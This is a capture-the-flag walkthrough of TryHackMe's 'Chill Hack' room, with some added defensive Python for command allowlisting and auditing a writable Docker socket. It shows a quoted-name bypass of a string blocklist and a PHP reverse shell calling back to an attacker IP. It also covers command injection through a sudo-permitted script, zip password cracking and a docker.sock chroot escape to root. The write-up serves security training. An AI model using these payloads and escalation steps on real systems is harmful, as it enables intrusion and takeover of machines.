Chill Hack(The Easy Way)

Today we will be solving the Chill Hack room of TryHackMe, which is an intermediate-level CTF. So let's join the room and start it.

We will start by scanning the target machine with nmap.

Command to be used:

sudo nmap -T4 -A ip_address

fig 1: nmap result

From the result we can see that anonymous login is allowed, so let's try to log in to FTP as anonymous.
Command used:

ftp ip_address

fig 2: FTP Anonymous login

Once we are in as anonymous, let's search for any flag or clues.
On searching, we find a note.txt file on the server. Now let's download note.txt to our local machine.

Command used to download the file: get note.txt

fig 3: note.txt

After downloading the note.txt file to our local machine let's look into its content.

fig 4: Content of note

From the above hint we learn that there are at least two users, Anurodh and Apaar, and
that there is someplace to enter commands with some filtering on strings.
Now let's search for the place where we can enter commands. There is a good chance that there are hidden directories, so let's use gobuster to search for them.
Command used:

gobuster dir -u http://ip_address -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

fig 5: gobuster result

Here we get one interesting directory called /secret.
Let's look into the secret directory and check whether we can find anything useful.

fig 6: command interface

BINGO!!! We get the command page. As mentioned in note.txt, some commands are filtered.
Let's test which commands are filtered and which are not.

fig 7: Hacker Alert Page

Here we get the hacker alert, which means the ls command is filtered, so let's try another command.

fig 8: Acceptable filter

Here pwd command is not filtered.

Now, let's set up a listener on the attacker machine using Netcat.
Command used:

nc -lnvp 4444

Then enter the reverse shell command into the command page, with part of the command name quoted so the string filter does not match it (the port in the payload must be the one the listener is bound to):

'p'hp -r '$sock=fsockopen("10.9.120.205",1234);exec("/bin/bash -i <&3 >&3 2>&3");'

Now we get a reverse shell from the target.
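The "Hacker alert" page is a string blocklist, and the quoted payload above gets past it because the filter looks at the raw text while the shell sees the unquoted command. As an added example (not code from the room or the write-up), here is a constructed blocklist of that kind next to an allowlist parser that resolves shell quoting with shlex before deciding and never hands raw input to a shell; the blocked and allowed word sets are assumptions:

```python
import shlex
import subprocess

# Constructed blocklist, modelled on the kind of string filter note.txt hints at.
BLOCKED_WORDS = {"ls", "php", "nc", "bash", "python"}

# Assumed allowlist: the only programs the page is meant to expose, no arguments.
ALLOWED_COMMANDS = {"pwd", "whoami", "id", "date", "uptime"}

SHELL_META = ";|&$`<>(){}\n"


def blocklist_allows(cmd: str) -> bool:
    """Naive filter: reject only if a blocked word appears verbatim in the text.

    Quoting defeats it: 'p'hp contains no substring "php", yet a shell runs php.
    """
    return not any(word in cmd for word in BLOCKED_WORDS)


def allowlist_parse(cmd: str):
    """Return an argv list if the request is an allowlisted program, else None.

    shlex.split applies shell quoting rules first, so 'p'hp becomes "php" and is
    judged by the name the shell would actually execute.
    """
    if any(c in cmd for c in SHELL_META):
        return None
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return None
    if len(argv) > 1:  # the allowlisted programs take no arguments here
        return None
    return argv


def run_allowlisted(cmd: str) -> str:
    """Execute the request without a shell, or return the alert text."""
    argv = allowlist_parse(cmd)
    if argv is None:
        return "Hacker alert: command not allowed"
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return proc.stdout
```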

Once we have the reverse shell, let's check which user we are running as by typing whoami.

fig 9: Reverse Shell

Here we can see that we are the www-data user.
Now let's start our search for privilege escalation. First, let's check:

sudo -l

fig 10 : sudo -l command

Here we can see that the user www-data can run the /home/apaar/.helpline.sh as apaar.
So before running it, let's check its content using cat.

fig 11: Content of helpline.sh

Looking at the script we can see that it is vulnerable to command injection, so let's exploit it.
For this we run .helpline.sh as apaar (the sudo entry seen above) and answer its prompts as follows:

Enter the person whom you want to talk with: hero
Hello user! I am hero, Please enter your message: ' /bin/bash

Then upgrade to an interactive TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'

fig 12: Running helpline.sh

We successfully escalated our privileges to apaar. Now let's go to apaar's home directory and check for a flag.

cd /home/apaar

Here we can see that there is a local.txt file. Let's check its content.

fig 13: user flag

BINGO!! we successfully got a user flag.

Now our next target is root access, so let's search the server for any hint.
First, let's check the /var/www directory.

Inside the files directory under /var/www we find an interesting file named hacker.php.
Let's check its content.

fig 14: the content of hacker.php

Here we get the image source: images/hacker-with-laptop_23-2147985341.jpg
Now let's download the image to our local system and check whether it contains a hidden file using steghide.
For this let's run an HTTP server on the target machine and then fetch the file from our local machine.

fig 15: HTTP server on Target System

Now let's download the image file into our local machine using wget.

fig 16: image downloaded into local system

Once the file is downloaded, let's analyze it using steghide.
Command used:

steghide --extract -sf hacker-with-laptop_23-2147985341.jpg

fig 17: steghide

Here we get the backup.zip file from the image. Let's try to unzip the file.

fig 18: trying to unzip the file

Here the zip file is password protected. So let's use zip2john and john to crack the password.

Command to be used:

zip2john backup.zip > input_john.txt

john --wordlist=/usr/share/wordlists/rockyou.txt input_john.txt

To show the cracked password:

john --show input_john.txt

fig 19: Zip Password

Here we get the password for the zip file which is pass1word.
Now let's unzip the file with the given password.

fig 20: Unzip Success

Here the source_code.php file is extracted. Now let's check the content of the file.

fig 21: Content of sourcecode.php

Here we get a base64 string in the if condition, and from the code we can guess that it is the encoded password of Anurodh. Let's decode the base64 using an online decoder.
Upon decoding, we get the password: !d0ntKn0wmYp@ssw0rd
Now let's try to connect via SSH as anurodh.

fig 22: ssh anurodh

We successfully gain access as anurodh. Now let's download linpeas.sh to the target system from our local machine using wget and run it to look for privilege escalation vectors.

fig 23: Running HTTP server on the local machine
fig 24: Downloading linpeas.sh on the target machine

Once linpeas.sh is on the target system, let's run it to look for privilege escalation points.

Command to be used :

chmod +x linpeas.sh

./linpeas.sh

fig 25: Output of linpeas

Here we can see that /var/run/docker.sock is writable, and linpeas gives a link. Let's visit the link and search for docker on that page.
Now let's run the docker command mentioned on the page.
Command :

docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash

Once we run the command we get "Unable to find image 'ubuntu:latest' locally".
So let's replace ubuntu with an image that is present locally.
New command :

docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash

fig 26: Running docker command for privilege escalation

After running the docker command we successfully gain root privileges.
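Anyone who can write to the Docker socket can ask the daemon for a container with the host filesystem mounted, which is exactly what the command above does, so a writable docker.sock is root-equivalent for that user. As an added example (not code from the room or the write-up), this audit classifies how reachable a socket is for a given user from its mode and ownership; the socket path is an assumption and any path can be passed in:

```python
import grp
import os
import pwd
import stat

# Assumed default location; pass another path to audit a different socket.
DOCKER_SOCK = "/var/run/docker.sock"


def socket_exposure(path: str, uid: int, gids: set) -> str:
    """Say who can write to `path` from the point of view of user (uid, gids).

    'world-writable', 'group-writable' and 'owner-writable' all mean that user
    can drive the Docker daemon and therefore reach root on the host.
    """
    st = os.stat(path)
    mode = st.st_mode
    if mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return "group-writable"
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return "owner-writable"
    return "not-writable"


def groups_of(username: str) -> set:
    """All gids a user holds: primary group plus supplementary groups."""
    primary = pwd.getpwnam(username).pw_gid
    extra = {g.gr_gid for g in grp.getgrall() if username in g.gr_mem}
    return {primary} | extra


def audit_user(username: str, path: str = DOCKER_SOCK) -> str:
    """Human-readable verdict for a named user on this host."""
    if not os.path.exists(path):
        return f"{path}: not present"
    user = pwd.getpwnam(username)
    verdict = socket_exposure(path, user.pw_uid, groups_of(username))
    if verdict == "not-writable":
        return f"{username} cannot drive the Docker daemon via {path}"
    return (f"{username} can drive the Docker daemon via {path} ({verdict}); "
            "treat as root-equivalent")


if __name__ == "__main__":
    print(audit_user(pwd.getpwuid(os.getuid()).pw_name))
```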

fig 27: Root privilege

Now let's go to the root directory and check for the flag.
Command :

cd /root
cat proof.txt

BINGO!!! We get the root flag.

fig 28: Root Flag.

Hence, by the above steps, we obtain both flags.

(NOTE: You can skip the privilege escalation to apaar and go straight to the root privilege escalation to get both flags, but it is good practice to follow the complete steps.)

References:

https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket
